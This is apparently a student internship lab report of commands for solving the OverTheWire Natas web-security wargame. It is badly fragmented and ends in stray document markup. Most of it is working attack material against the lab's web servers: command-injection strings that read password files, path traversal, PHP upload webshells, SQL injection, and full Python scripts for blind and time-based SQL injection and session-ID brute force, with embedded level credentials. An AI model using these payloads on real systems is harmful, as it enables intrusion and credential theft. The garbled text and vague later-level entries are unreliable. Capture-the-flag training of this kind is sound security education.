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zcqh8u9vfuv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DIGISURAKSHA PARHARI FOUNDATION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Cybersecurity Wargame Internship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Lab Report: Krypton Wargame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Commands file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Prajakta Shinde - KRYPTON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Saniya Shinde – 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Riya Rasal – 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Shraddha Khade – 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Kumkum Yadav – LEVIATHAN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NATAS COMMANDS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0 → Level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→ "View Page Source" or Ctrl+U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1 →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shortcut Ctrl+U to view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Alternative: F12 for developer tools or browser menu View →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2 →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navigation to http://natas2.natas.labs.overthewire.org/files/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http://natas2.natas.labs.overthewire.org/files/users.txt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3 →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navigation to http://natas3.natas.labs.overthewire.org/robots.txt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navigation to http://natas3.natas.labs.overthewire.org/s3cr3t/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http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt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4 → Level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F12 to open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browser extension or network request modification tool to set Referer header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"http://natas5.natas.labs.overthewire.org/"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Alternative: curl -e "http://natas5.natas.labs.overthewire.org/" -u natas4:PASSWORD http://natas4.natas.labs.overthewire.org/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5 → Level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F12 to open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Application/Storage tab and locate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"loggedin" cookie value from 0 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6 → Level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http://natas6.natas.labs.overthewire.org/includes/secret.inc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discovered secret in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7 → Level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URL to: http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8.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8 → Level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PHP or similar tools to reverse the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$encodedSecret = "3d3d516343746d4d6d6c315669563362";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$secret = base64_decode(strrev(hex2bin($encodedSecret)));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9 → Level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in search field: ; cat /etc/natas_webpass/natas10 # (this terminates the grep command and reads the password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10 → Level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in search field: . /etc/natas_webpass/natas11 (this makes grep search for any character in both the dictionary and the password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11 → Level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F12 to open developer tools and examine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code to find the XOR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$defaultData = array("showpassword"=&gt;"no", "bgcolor"=&gt;"#ffffff");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$cookieData = base64_decode(urldecode(/* cookie value */));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$key = $defaultData XOR $cookieData;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new cookie with "showpassword"=&gt;"yes"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and set the new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list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12 → Level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PHP file with: &lt;?php echo file_get_contents("/etc/natas_webpass/natas13");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browser developer tools to change the hidden "filename" field from "random.jpg" to "random.php"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 the file and accessed the resulting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13 → Level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PHP file with JPEG magic bytes: FF D8 FF E0 followed by PHP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D8 FF E0 00 10 4A 46 49 46 00 01 &lt;?php echo file_get_contents("/etc/natas_webpass/natas14");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browser developer tools to change the hidden "filename" field from "random.jpg" to "random.php"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 the file and accessed the resulting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14 → Level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 to view page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in username field: " OR 1=1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password field empty or entered any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15 → Level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 used for automation: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 import string url = 'http://natas15.natas.labs.overthewire.org' auth = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J') chars = string.ascii_letters + string.digits password = '' for i in range(1, 33): for c in chars: payload = f'natas16" AND BINARY SUBSTRING(password,{i},1)="{c}"#' response = requests.post(url, auth=auth, data={'username': payload}) if "This user exists" in response.text: password += c print(f"[+] Found character {i}: {c}") break print("[*] Password:", password)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16 → Level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input used in the form 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cat${IFS}/etc/natas_webpass/natas17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17 → Level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 import string import time url = 'http://natas17.natas.labs.overthewire.org' auth = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw') chars = string.ascii_letters + string.digits password = '' for i in range(1, 33): for c in chars: payload = f'natas18" AND BINARY SUBSTRING(password,{i},1)="{c}" AND sleep(2)#' start = time.time() response = requests.post(url, auth=auth, data={'username': payload}) duration = time.time() - start if duration &gt; 2: password += c print(f"[+] Found character {i}: {c}") break print("[*] Password:",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18 → Level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 url = 'http://natas18.natas.labs.overthewire.org' auth = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP') for i in range(1, 641): session_id = str(i) cookies = {'PHPSESSID': session_id} response = requests.get(url, auth=auth, cookies=cookies) if "You are an admin" in response.text: print(f"[+] Admin session found: {session_id}") print(response.text)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19 → Level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 import binascii url = 'http://natas19.natas.labs.overthewire.org' auth = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs') for i in range(1, 641): username = 'admin' session_raw = f"{username}{i}" session_hex = binascii.hexlify(session_raw.encode()).decode() cookies = {'PHPSESSID': session_hex} response = requests.get(url, auth=auth, cookies=cookies) if "You are an admin" in response.text: print(f"[+] Found admin session: {session_hex}") print(response.text)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20 → Level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payload attempt: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../../../../etc/natas_webpass/natas21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21 → Level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Visit: http://natas21-experimenter.natas.labs.overthewire.org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form with admin=1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PHPSESSID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Visit: http://natas21.natas.labs.overthewire.org using the same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22 → Level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 url = 'http://natas22.natas.labs.overthewire.org?revelio=true' auth = ('natas22', 'G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s') response = requests.get(url, auth=auth, allow_redirects=False) print(response.text)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23 → Level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PHP payload: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&amp;lt;?php echo file_get_contents('/etc/natas_webpass/natas24');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the uploaded file via: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http://natas23.natas.labs.overthewire.org/uploads/shell.php.jpg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24 → Level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Burp Suite or crafted a POST request manually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username=admin&amp;amp;passwd[]=1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25 → Level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http://natas25.natas.labs.overthewire.org/?lang=....//....//....//....//etc/natas_webpass/natas26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26 → Level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custom PHP class with a destructor that reads /etc/natas_webpass/natas27.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Serialized and base64-encoded the payload.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27 → Level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username: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natas28\x00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28 → Level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 Python script to automate block decryption.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29 → Level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known-plaintext attack techniques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30 → Level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Injection payload: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or 1=1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31 → Level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cat /etc/natas_webpass/natas32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#Level 32 → Level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http://natas32.natas.labs.overthewire.org.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a page with a form that likely handles user input unsafely.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to exploit potential buffer overflow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Level 33 → Level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the provided C source code for potential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a format string vulnerability in the logging mechanism.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 a payload to overwrite memory and potentially gain code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334" w:right="1335" w:header="113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